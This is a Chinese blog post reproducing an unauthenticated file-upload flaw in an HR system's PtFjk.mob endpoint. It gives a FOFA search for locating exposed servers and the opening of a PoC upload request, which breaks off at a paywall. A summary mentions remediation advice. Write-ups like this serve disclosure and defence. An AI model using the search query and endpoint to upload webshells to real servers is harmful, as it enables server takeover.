57qi5rW35LqRZUhS PtFjk.mob 任意文件上传漏洞复现

已于 2024-07-30 18:46:45 修改
阅读量1.1k 收藏 1
点赞数 10
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-05-08 12:29:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/138567248
版权
本文详细介绍了57qi5rW35LqRZUhS人力资源管理系统中的PtFjk.mob接口存在的未授权文件上传漏洞。攻击者可以利用此漏洞上传webshell,执行命令并获取服务器权限。复现环境中,通过FOFA查询到相关路径。修复建议包括联系厂商升级到最新版本,以及临时通过配置nginx或tomcat的web.xml限制访问。
摘要由CSDN通过智能技术生成

0x01 产品简介

57qi5rW35LqRZUhS是大中型企业广泛采用人力资源管理系统。某云是国内顶尖的HR软件供应商,是新一代eHR系统的领导者。

0x02 漏洞概述

57qi5rW35LqRZUhS系统PtFjk.mob接口处存在未授权文件上传漏洞,攻击者可上传webshell来命令执行,获取服务器权限。

0x03 复现环境

FOFA:body="/RedseaPlatform/skins/images/favicon.ico"

677809c0ca6a4fddb85927a406ac50b0.png

0x04 漏洞复现 

PoC

POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbD
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
世纪信通管理系统 多处 SQL注入漏洞复现
0xSec
12-09 1535
世纪信通管理系统LoginForm2.aspx、initLogin.ashx 等接口处存在SQL注入漏洞经身份验证的攻击者除了可以利用SQL注入漏洞取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步取服务器系统权限。
57qi5rW35LqRZUhS pc.mob SQL注入漏洞复现
0xSec
08-17 583
57qi5rW35LqRZUhS pc.mob 接口存在SQL注入漏洞经身份验证的远程攻击者除了可以利用SQL注入漏洞取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步取服务器系统权限。
文件上传漏洞webshell)和文件包含漏洞
weixin_49390750的博客
08-08 920
文件上传漏洞webshell
web安全 - 文件上传漏洞
qq_53058639的博客
03-15 736
解释并执行了用户上传的脚本,导致代码执行 2) 上传文件是Flash的策略文件crossdomain.xml,黑客用以控制Flash在该域下的行为 3) 上传文件是病毒、木马文件,黑客用以诱骗用户或者管理员下载执行 4) 上传文件是钓鱼图片或为包含了脚本的图片,在某些版本的浏览器中会被作为脚本执行,被用于钓鱼和欺诈 常见的攻击方式就是攻击者上传了一个可执行的脚本文件,并通过此脚本文件得了执行服务器端命令的能力 案例。web是对外开放的,自然成了的重点关照对象,有事没事就来入侵一波,
Web安全-文件上传漏洞(常见上传解析漏洞,常见检测方式绕过)
m0_74220316的博客
07-04 2430
Webshell是一种利用Web服务器的漏洞或弱点,通过远程上传恶意代码到服务器上(实质上是一种网页后门),并执行命令或控制服务器的一种攻击方式。在上传过后,该文件与网站服务器web目录下的正常网页文件混在一起,然后就可以通过该文件得到一个命令执行环境攻击者可以通过Webshell取服务器的高权限,进而进行非法操作,例如修改服务器文件、数据库操作、执行系统命令等。Webshell具有隐蔽性高、操作方便等特点,常被用于非法攻击、入侵行为或用于进行系统安全评估和渗透测试。
[ 攻防演练演示篇 ] 利用通达OA 文件上传漏洞上传webshell取主机权限
qq_51577576的博客
03-06 3197
[ 攻防演练演示篇 ] 利用通达OA 文件上传漏洞上传webshell取主机权限
无线充电标准QI中文版(D).rar
03-04
这个压缩包文件“无线充电标准QI中文版(D).rar”包含了对QI标准的详细解读,非常适合对中国市场有关注的教育和学习用途。 QI标准的核心是磁感应技术,它利用电磁场在发送器和接收器之间传递能量。该技术基于法拉第...
tian_qi_yu_bao.rar_tian.qi.yu.b_天气预报
09-24
《天气预报应用详解——以"tian_qi_yu_bao.rar_tian.qi.yu.b"为例》 在日常生活中,我们常常需要取实时的天气信息,以便于规划行程或者应对突发的气候变化。"tian_qi_yu_bao.rar_tian.qi.yu.b"就是一款专为旅行和...
Qi充电协议1.2.3中文翻译.docx
04-13
Qi充电协议1.2.3版分为两种功率配置文件:**基线功率分布**(最高5W)和**扩展功率分布**(超过5W)。 1. **基线功率配置文件**:适用于大多数低功率设备,如智能手机等。支持可选的**异物检测(FOD)扩展**功能。 2....
宏景eHR 任意文件上传漏洞复现(0day)
0xSec
07-24 4842
宏景eHR OfficeServer.jsp接口处存在任意文件上传漏洞经过身份认证的远程攻击者利用漏洞上传任意文件,最终可导致服务器失陷。
1day CRMEB开源电商系统 products 接口处存在SQL注入
weixin_43167326的博客
06-18 590
CRMEB开源电商系统是遥遥领先的开源电商系统,框架采用Tp6+MySQL+elementUI+uniapp,商城系统可商用;前后台都支持风格切换,包含小程序商城、H5商城、公众号商城、App,支持多语言、分销、拼团、砍价、秒杀、优惠券、积分、抽奖、会员等级、小程序直播、页面DIY,前后端分离,方便二开,使用文档、接口文档、数据字典、代码生成、二开文档/视频教程。
宏景eHR SQL注入漏洞复现(CNVD-2023-08743)
0xSec
05-30 5055
宏景eHR 存在SQL注入漏洞经过身份认证的远程攻击者利用漏洞执行任意SQL指令,从而窃取数据库敏感信息。
自动化测试工具UIRecorder安装教程
热门推荐
ajdeng的博客
02-09 1万+
UIRecorder安装教程
OpenAPI平台构建与在线文档
chuangfei7389的博客
01-05 1404
1. 在线接口文档生成 OpenAPI第三方接口平台集成了apidoc作为在线文档系统。 apidoc是一个轻量级的在线REST接口文档生成系统,可以根据其特定的规则的代码注释来生成静态网页。 同时apidoc支持多种主流的编码语言,包括Java、C、C#、PHP和Javascript...
红海云eHR系统助力HR破解校招困境
y1006的博客
01-14 1327
每年“金九银十”之际,也是各大企业校园招聘旺季,对大中型企业来说,校园招聘是输送储备人才的重要渠道,HR部门往往投入大量人力物力和精力,需要协调企业各种资源,因此,校园招聘的“留存率”也在无形中成为企业管理者考核HR校招成果的重要指标。 近日,某人力资源论坛上一则HR的案例就引起了大家的关注与讨论: 去年年初,我入职现在的公司担任人事主管一职,直接对接总裁,负责人力资源部的统筹工作。珠宝公司,员工一百多人,业务处在扩张期,招聘需求较大。为了缓解招聘压力、在得到了用人部门支持的情况下,去年11月份校招正式开
linux驱动模型开发2——linux platfoem总线机制讲解与实例开发
老徐2014
11-01 5027
1、概述: 通常在Linux中,把SoC系统中集成的独立外设单元(如:I2C、IIS、RTC、看门狗等)都被当作平台设备来处理。 从Linux2.6起,引入了一套新的驱动管理和注册机制:Platform_device和Platform_driver,来管理相应设备。 Linux中大部分的设备驱动,都可以使用这套机制,设备用platform_device表示,驱动用platform
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
A_Lonely_Smile的博客
10-29 958
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
前端如何安全存储密钥,防止信息泄露
AM1n98的博客
10-30 1221
把公钥写在前端代码文件里被公司检测到了要整改,整理几种常见的前端密钥存储方案。
冷钱包与热钱包的差异 | 加密货币存储的安全方案
最新发布
tusik68的博客
11-01 1147
想要安全存储加密货币?了解冷钱包和热钱包的核心差异,找到适合的存储方式,确保您的数字资产安全无忧。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值